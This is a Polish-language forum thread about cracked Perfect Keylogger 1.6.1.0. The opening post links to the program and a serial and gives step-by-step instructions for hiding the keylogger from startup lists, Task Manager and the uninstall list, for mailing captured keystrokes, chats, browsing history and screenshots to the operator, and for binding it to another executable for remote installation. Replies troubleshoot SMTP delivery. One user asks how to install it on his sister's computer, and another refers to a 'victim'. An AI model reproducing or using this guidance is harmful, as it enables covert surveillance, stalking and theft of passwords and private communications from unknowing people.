Perfect Keylogger 1.6.1.0 + Serial + Instrukcja + END

Achates

Były Administrator
Członek Załogi
Dołączył
Listopad 16, 2001
Posty
147
Pisze tylko i wyłoncznie tego posta aby zakończyć raz na zawsze większość problemów z Perfect Keyloggerem 1.6.1.0

Tu jest link do programu i do seriala http://iko4.fm.interia.pl/2.htm

Prosze nie pisać głupich postów w stylu że niepasuje ten serial bo był sprawdzony!!

Instrukcja obsługi niestety nie moja ale bardzo dobra i precyzyjna znaleziona na forum Gratulacje dla autora

Jak zrobisz wszytko identycznie jak jest napisane to napewno będzie wszytko działać w 100% zresztą jest tam fukncja testu więc najpierw sprawdź czy logi dochodzą na e-meil lub ftp ja osobiś cie polecam serwer ftp logi dochodzą na 100% (sprawdzone )


Konfiguracja.

Po poprawnym zainstalowaniu i uruchomieniu programu, klikamy ppm na ikone w trayu i dajemy options....

W menu general wybieramy:

-run on windows startup [x] - czy chcemy aby keylogger uruchamiał się przy starcie systemu.
-don't show program icon at startup [x] - czy chcemy aby niepokazywało ikony programu przy starcie systemu.
-show / hide program icon: ctrl + alt + del [x] - jeżeli to zaznaczymy to po przyciśnięciu ctrl + alt + del , niebedzie widać programu.
-make the program invisible in the windows startup list [x] - dodaje program do listy programów uruchamiających się przy starcie systemu.
-remove the program from start menu and uninstall list [x] - usuwa program z menu start i list programów do odinstalowania.

W menu logging wszysto pozostawiamy bez zmian.

W screenshots ustawiamy czy chcemy aby keylogger wysyłał nam screenshota, jakość obrazu, i maxymalny rozmiar screena.

e-mail tutaj ustawiamy w jakim formacie mamy dostawać logi i na jakiego maila.
-try to send logs by e-mail every [x] - to oczywiście zaznaczamy i ustawiamy co jaki czas mamy dostawać logi.
-text log(keystrokes) [x] - zaznaczamy jeżeli chcemy w logach dostawać wszystkie wpisane znaki.
-chat log(chat sessions) - zaznaczamy jeżeli chcemy dostać logi z czata.
-web log(websites visited) - zaznaczamy jeżeli chcemy dostać wszystkie odwiedzone strony.
-visual log(screenshot) - zaznaczamy jeżeli chcemy dostawać screeny.
-html (can be viewed directly in the e-mail reader) [x] - polecam zaznaczyć ta opcje ponieważ logi możemy odczytać nawet wtedy gdy niemamy zainstalowanego perfect keyloggera.
-clear logs after successful sending [x] - czyści logi po poprawnym wyslaniu.

W zakladce delivery wpisujemy:

-send to: [wpisujemy tutaj na jaki e-mail chcemy dostawać logi]
-smtp server: [wpisuje adres servera smtp swojej poczty]
-port numer: [domyślny to 25]
-username: [wpisujemy login do poczty]
-password: [haslo do poczty]

oczywiście na sam koniec klikamy na ok


Kompilacja.

Końcowa część, której bindujemy server z jakimś plikiem exe.
-klikamy ppm na ikone programu w trayu , na remote installation. w pierwszej części klikamy na "dalej>".w dalszej cześci wybieramy czy chcemy dostać potwierdzenie o poprawnym zainstalowaniu servera.dalej wybieramy plik z jakim chcemy zbindować (czyli polaczyć). nastepnie klikamy na zakończ.
server powinien byc w tym samym katalogu z ktorym bindowaliśmy.

Odinstalowanie.

a)pisujemy w start>>uruchom>>msconfig[enter]
b)przechodzimy do zakladki "uruchamianie"
c)odznaczamy "bpk" aby dajemy ok i zastosuj , usuchamiamy ponownie komputer
d)przechodzimy do katalogu x:windowssystem32 i usuwamy 4 pliki bpk.


Jak zrobić aby keylogger niezdołał wysłać logów?

odpowiedz jest oczywiście prosta. należy zainstalować byle jaki firewall ,ktory będzie nas powiadamiał o każdym połączeniu. ja osobiście polecam zone alarm

To wszystko END






rywin




Dołączył: 22 Kwi 2003
Posty: 259
Wysłany: Wto 11 Sty, 2005



--------------------------------------------------------------------------------

Maniak111 jak chcesz cos dopisac to daj znac.
 

patology

Były Moderator
Dołączył
Październik 30, 2005
Posty
205
jak chce wpisac klucz rejestracyjny to wyskakuje ikonka ze albo zly klucz albo zle imie :/ co zrobic
 

palar14

Użytkownik
Dołączył
Wrzesień 11, 2005
Posty
3
Kurde konfiguruje wszystko0 wedug poradnika czyli :

Send to - mój mail na interii
SMTP Server - smtp.poczta.onet.pl
Port Numer - 25
username - [email protected]
password - ******
Authentication Method - AUTH LOGIN

I potem jak daje SEND TEST to pisze "Unable the send to message"

Jak ktoś pomoże w czym rzecz to wielka mu chwala i cześć oraz dodam punkt do rankingu POMÓGŁ
 

woro

Użytkownik
Dołączył
Listopad 27, 2005
Posty
1
Siostra w tej chwili jest w Warszawie
smile.gif
czy moge jej np wrzucic to na kompa? Co i jak to zrobic bo nie znam sie na tym ;/
Prosze o pomoc bo jestem poczatkujacy
<
 

patology

Były Moderator
Dołączył
Październik 30, 2005
Posty
205
Originally posted by woro
Siostra w tej chwili jest w Warszawie
smile.gif
czy moge jej np wrzucic to na kompa? Co i jak to zrobic bo nie znam sie na tym ;/
Prosze o pomoc bo jestem poczatkujacy
<
Przeczytaj dokładnie ten temat a potem zadawaj pytania.
smile.gif
 

adikwiat

Użytkownik
Dołączył
Luty 10, 2005
Posty
2
:(

Dobry poradnik
smile.gif

Ale mam pytanko:
Usunołem te 4 pliki.
Mam zainfekowany plik - włączam go u siebie lub na kompie ofiary i wtedy wg. ustawień wszystko robi??
Jak go usunąć
Proszę o szybką odpowiedz
<
 

adikwiat

Użytkownik
Dołączył
Luty 10, 2005
Posty
2
Tyle to i ja wiem...
ale bym chciał wiedzieć gdzie on się instaluje...
Nawet jak by, gdy go włącze (keyloga) to nie wysyła logów z kompa
Dostałem loga ale to program go wysłał bo po usunięciu go zadnych logów nie ma z keyloggera ??
Nie działa?????;(
 

red_ag

Były Moderator
Dołączył
Listopad 26, 2005
Posty
261
smtp.o2.pl ! e-mail na o2.pl
smtp.wp.pl ! e-mail na wp.pl

Wszystkie inne nieprawidłowe!
 

Senio

Użytkownik
Dołączył
Wrzesień 15, 2005
Posty
7
@up
a nieprawda ja mam ******@poczta.onet.pl, server zrobilem smtp.onet.pl i test msg doszedl.
w czym problem?
 

Senio

Użytkownik
Dołączył
Wrzesień 15, 2005
Posty
7
Napisal "wszystkie inne nieprawidlowe" a mi dziala na poczta.onet.pl
btw mam pytanie. mam PK i wszystko dziala, wysyla mi logi i nagle puff key sie wylancza i niemoge go wlaczyc spowrotem :/ proboje i proboje ale niemoge :S
 

Michal_1992

Użytkownik
Dołączył
Grudzień 27, 2005
Posty
1
problem

Mam problem.... otóz podobny jaki kolega mial niemoge wyslac testu na emaila (SEND TEST) wyskakuje mi okienko z napisem ( Unable to conect to server.)wszystko mam pracej prawidlowo, moze jednak cos posulem, mam nadzieje ze doswiadczenie koledzy mi pomoga i ocenia ten blad ale dla pomocy napisze wam co mam w opcjach --> email-->delivery

send to ----------->[email protected]

SMTP server ------>smtp.onet.pl

Port number------->25

Username----------->[email protected] (probowalem tak i jescze tak mojemail

password------------>mojemail00

Authectional Methood->LOGIN PLAIN (niewiem co to jest bardzo bym prosil o wytlumaczenie.

no i chyba to wszystko, email oraz haslo jest przpadkowe
<
 
Do góry Bottom